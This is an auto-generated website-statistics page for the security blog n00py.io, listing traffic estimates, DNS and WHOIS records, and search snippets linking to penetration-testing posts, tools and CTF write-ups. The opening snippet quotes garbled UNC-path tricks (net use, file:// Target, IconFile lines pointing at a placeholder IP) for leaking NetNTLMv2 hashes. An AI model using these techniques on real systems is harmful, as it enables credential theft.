Website stats and analysis

While browsing Twitter recently I came upon a tweet that I found to be very interesting: Did know that u can steal #NetNTLMv by changing #SMB port to bypass sec-things: net use \\...@\tor pdf : /F (\\\\IP@\\t)or dubdoc : ///IP@/tor doc: Target="file://IP@/t.dotx"or lnk: URL=file://IP@/t.htmor: IconFile=\\IP@\t.ico#RedTeam #NTLM cc @ddouhine — V (@mynameisv__) April , I… Rea...

2.48 Rating by Usitestat

It has a alexa rank of #3,303,402 in the world. It is a domain having .io extension. It is estimated worth of $ 480.00 and have a daily income of around $ 2.00. As no active threats were reported recently, n00py.io is SAFE to browse.

Traffic Report

Daily Unique Visitors: 265
Daily Pageviews: 530

Estimated Valuation

Income Per Day: $ 2.00
Estimated Worth: $ 480.00

Search Engine Indexes

Google Indexed Pages: Not Applicable
Yahoo Indexed Pages: 209
Bing Indexed Pages: Not Applicable

Search Engine Backlinks

Google Backlinks: Not Applicable
Bing Backlinks: Not Applicable
Alexa BackLinks: Not Applicable

Safety Information

Google Safe Browsing: No Risk Issues
Siteadvisor Rating: Not Applicable
WOT Trustworthiness: Very Poor
WOT Privacy: Very Poor
WOT Child Safety: Very Poor

Website Ranks & Scores

Alexa Rank: 3,303,402
PageSpeed Score: 85 ON 100
Domain Authority: 49 ON 100
Bounce Rate: Not Applicable
Time On Site: Not Applicable

Web Server Information

Hosted IP Address:

198.54.116.238

Hosted Country:

United States US

Location Latitude:

33.7273

Location Longitude:

-84.4254

Traffic Classification

Total Traffic: No Data
Direct Traffic: No Data
Referral Traffic: No Data
Search Traffic: No Data
Social Traffic: No Data
Mail Traffic: No Data
Display Traffic: No Data

Search Engine Results For n00py.io

n00py Blog – /Users/n00py/

- http://www.n00py.io/

Recently I read the article on the Coalfire Blog about executing an obfuscated PowerShell payload using Invoke-CradleCrafter. This was very useful, as Windows Defender has upped...


Understanding UNC paths, SMB, and WebDAV – n00py Blog

- https://www.n00py.io/2019/06/understanding-unc-paths-smb-and-webdav/

While browsing Twitter recently I came upon a tweet that I found to be very interesting: I had been well aware of using UNC paths to leak NLTMv2 handshakes with SMB, but I had...


n00py (n00py) · GitHub

- https://github.com/n00py

I look at packets. . n00py has 47 repositories available. Follow their code on GitHub.


GitHub - n00py/Hwacha: Deploy payloads to *Nix systems en ...

- https://github.com/n00py/Hwacha

Nov 04, 2017 · Deploy payloads to *Nix systems en masse . Contribute to n00py/Hwacha development by creating an account on GitHub.


NVD - CVE-2019-20154

- https://nvd.nist.gov/vuln/detail/CVE-2019-20154

Current Description . An issue was discovered in Determine (formerly Selectica) Contract Lifecycle Management (CLM) v5.4. A cross-site scripting (XSS) vulnerability in multiple...


n00py ~ VulnHub

- https://www.vulnhub.com/author/n00py,493/

This website uses 'cookies' to give you the best, most relevant experience. Using this website means you're happy with this. You can find out more about the cookies ...


NVD - CVE-2019-20155

- https://nvd.nist.gov/vuln/detail/CVE-2019-20155

Current Description . An issue was discovered in report_edit.jsp in Determine (formerly Selectica) Contract Lifecycle Management (CLM) v5.4. Any authenticated user may execute...


TryHackMe: Internal Writeup. In this article, I will be ...

- https://medium.com/bugbountywriteup/tryhackme-internal-writeup-480ce471efdd

In this article, I will be demonstrating my approach to completing the Internal Capture The Flag (CTF), a free Penetration Testing Challenge room available on the TryHackMe...


Avenger Infinity Stones CTF. This writeup documents my ...

- https://medium.com/swlh/avenger-infinity-stones-ctf-b451cd24170b

This writeup documents my solution to solving the Avengers Infinity Stones Capture The Flag (CTF) machine available on vulnerable hub and created by Hacking Articles. I will...


389, 636, 3268, 3269 - Pentesting LDAP - HackTricks

- https://book.hacktricks.xyz/pentesting/pentesting-ldap

Note that if you can modify values you could be able to perform really interesting actions. For example, imagine that you can change the "sshPublicKey" information of your user...


BSides Rochester 2018 - Ducky-in-the-Middle: Injecting ...

- https://www.youtube.com/watch?v=nGWKnR22H6w

Apr 27, 2018 · Outside of work I blog at n00py.io and perform independent security research. I have authored multiple penetration testing tools and have presented …


Learning by practicing: Having Fun with CrackMapExec

- https://www.securitynik.com/2019/05/having-fun-with-crackmapexec.html

In this post, we will be learning a bit about the tool CrackMapExec . This tool is not installed by default on Kali and thus we need to inst...


Hwacha - Deploy Payloads To *Nix Systems En Masse

- https://www.kitploit.com/2018/03/hwacha-deploy-payloads-to-nix-systems.html

Hwacha is a tool to quickly execute payloads on *Nix based systems. Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained.


Executing Meterpreter in Memory on Windows 1 … - netsec

- https://www.reddit.com/r/netsec/comments/9j4air/executing_meterpreter_in_memory_on_windows_10_and/

n00py.io/2018/0... 5 comments. share. save hide report. 87% Upvoted. This thread is archived. New comments cannot be posted and votes cannot be cast. Sort by. best. level 1....


All links from Hacker Playbook 3, with bit.ly ... - GitHub

- https://gist.github.com/audibleblink/4fac43157d791774ff28237b2a8c9b35

All links from Hacker Playbook 3, with bit.ly links unfurled - hpb3_links.txt


Speakers – #BSidesPR

- http://bsidespr.org/2017/speakers/

Esteban Rodriguez works as a Security Consultant working at Coalfire performing network and web application penetration testing. New to the field of offensive security, he...


From Workstation to Domain Admin: Why Secure ...

- https://i.blackhat.com/us-18/Wed-August-8/us-18-Metcalf-From-Workstation-To-Domain-Admin-Why-Secure-Administration-Isnt-Secure.pdf

From Workstation to Domain Admin: Why Secure Administration Isn't Secure and How to Fix It Sean Metcalf CTO, Trimarc


CTF – Rick and Morty – Fun with Flags

- https://barnyserver.com/ctf/2017/12/ctf-rick-and-morty/

Dec 18, 2017 · It is a very simple Rick and Morty themed CTF. There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root.


RCE on endpoints - Splunk Magic! - c:\rusher blog

- https://chryzsh.github.io/notpublished/2019-10-02-rce-on-endpoints-splunk-magic/

RCE on endpoints - Splunk Magic! Attacking machines running the Splunk Universal Forwarders to achieve RCE. Overview. I sometimes find myself on engagements in a network with no...


Exploiting Administrator Insecurities

- https://adsecurity.org/wp-content/uploads/2018/08/2018-DEFCON-ExploitingADAdministratorInsecurities-Metcalf.pdf

Exploiting Active Directory Administrator Insecurities Sean Metcalf (@Pyrotek3) s e a n @ adsecurity . org www.ADSecurity.org


Exploiting Administrator Insecurities - DEF CON

- https://media.defcon.org/DEF CON 26/DEF CON 26 presentations/DEFCON-26-Sean-Metcalf-Exploiting-Administrator-Insecurities-Updated.pdf

Exploiting Active Directory Administrator Insecurities Sean Metcalf (@Pyrotek3) s e a n @ adsecurity . org www.ADSecurity.org


WPForce: Wordpress Attack Suite • Penetration Testing

- https://securityonline.info/wpforce-wordpress-attack-suite/

Sep 10, 2017 · WPForce is a suite of Wordpress Attack tools. Currently, this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads...

Page Resources Breakdown

Homepage Links Analysis

n00py Blog – /Users/n00py/

Website Inpage Analysis

H1 Headings: 1 H2 Headings: Not Applicable
H3 Headings: 24 H4 Headings: Not Applicable
H5 Headings: Not Applicable H6 Headings: Not Applicable
Total IFRAMEs: Not Applicable Total Images: 1
Google Adsense: Not Applicable Google Analytics: Not Applicable

Mobile Friendly Check


Mobile Friendly : Unknown
Score : Unknown

No data to show.

Websites Hosted on Same IP (i.e. 198.54.116.238)

First Office

- firstoff.net

  Not Applicable   $ 8.95

My Blog - My WordPress Blog

- shopclick.biz

My WordPress Blog

  2,840,467   $ 480.00

MAN iN PARADISE • Travel & Lifestyle Magazine For Men

- maninparadise.com

Travel & Lifestyle Magazine For Men

  1,363,439   $ 960.00

HTTP Header Analysis

Http-Version: 1.1
Status-Code: 200
Status: 200 OK
Date: Thu, 03 Oct 2019 00:39:50 GMT
Server: Apache
X-Powered-By: PHP/5.6.40
Link: ; rel="https://api.w.org/"
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10975
Content-Type: text/html; charset=UTF-8

Domain Nameserver Information

Host IP Address Country
dns1.namecheaphosting.com 156.154.132.200 United States United States
dns2.namecheaphosting.com 156.154.133.200 United States United States

DNS Record Analysis

Host Type TTL Extra
n00py.io A 1176 IP: 198.54.116.238
n00py.io NS 1800000 Target: dns1.namecheaphosting.com
n00py.io NS 1800000 Target: dns2.namecheaphosting.com
n00py.io SOA 1800000 MNAME: dns1.namecheaphosting.com
RNAME: audit.namecheaphosting.com
Serial: 2016100506
Refresh: 86400
Retry: 7200
Expire: 3600000
n00py.io MX 1200 Priority: 30
Target: smx3.web-hosting.com
n00py.io MX 1200 Priority: 20
Target: smx2.web-hosting.com
n00py.io MX 1200 Priority: 10
Target: smx1.web-hosting.com
n00py.io TXT 1200 TXT: MAltYWlsLm4wMHB5LmlvLgo=

Alexa Traffic Rank

Alexa Search Engine Traffic

Full WHOIS Lookup

Domain Name: N00PY.IO
Registry Domain ID:
D503300000040320213-LRMS
Registrar WHOIS Server:
whois.namecheap.com
Registrar URL: www.namecheap.com
Updated
Date: 2019-09-12T08:52:09Z
Creation Date:
2016-10-05T14:42:28Z
Registry Expiry Date:
2020-10-05T14:42:28Z
Registrar Registration Expiration
Date:
Registrar: NameCheap, Inc
Registrar IANA ID:
1068
Registrar Abuse Contact Email:
[email protected]
Registrar Abuse Contact Phone:
+1.6613102107
Reseller:
Domain Status: ok
https://icann.org/epp#ok
Registrant Organization: WhoisGuard,
Inc.
Registrant State/Province: Panama
Registrant Country:
PA
Name Server: DNS1.NAMECHEAPHOSTING.COM
Name Server:
DNS2.NAMECHEAPHOSTING.COM
DNSSEC: unsigned

>>> Last
update of WHOIS database: 2019-10-03T00:39:13Z

Similarly Ranked Websites

TecMate Home - TecMate

- tecmate.com

3,303,411   $ 480.00

Cogmed

- cogmed.com

Cogmed is the world’s leading cognitive improvement program, based on digital working memory training.

3,303,431   $ 480.00

Chapter

- chapter.org

3,303,435   $ 480.00

Service Unavailable

- igdokme.ir

3,303,453   $ 480.00

FHR Distributör & Grossist iPhone Reservdelar

- fhr.se

FHR - Reservdels grossist vi lagerför över 8000 reservdelar till smartphones och surfplattor. Främst Apple iPhone iPad Samsung Galaxy Sony.

3,303,467   $ 480.00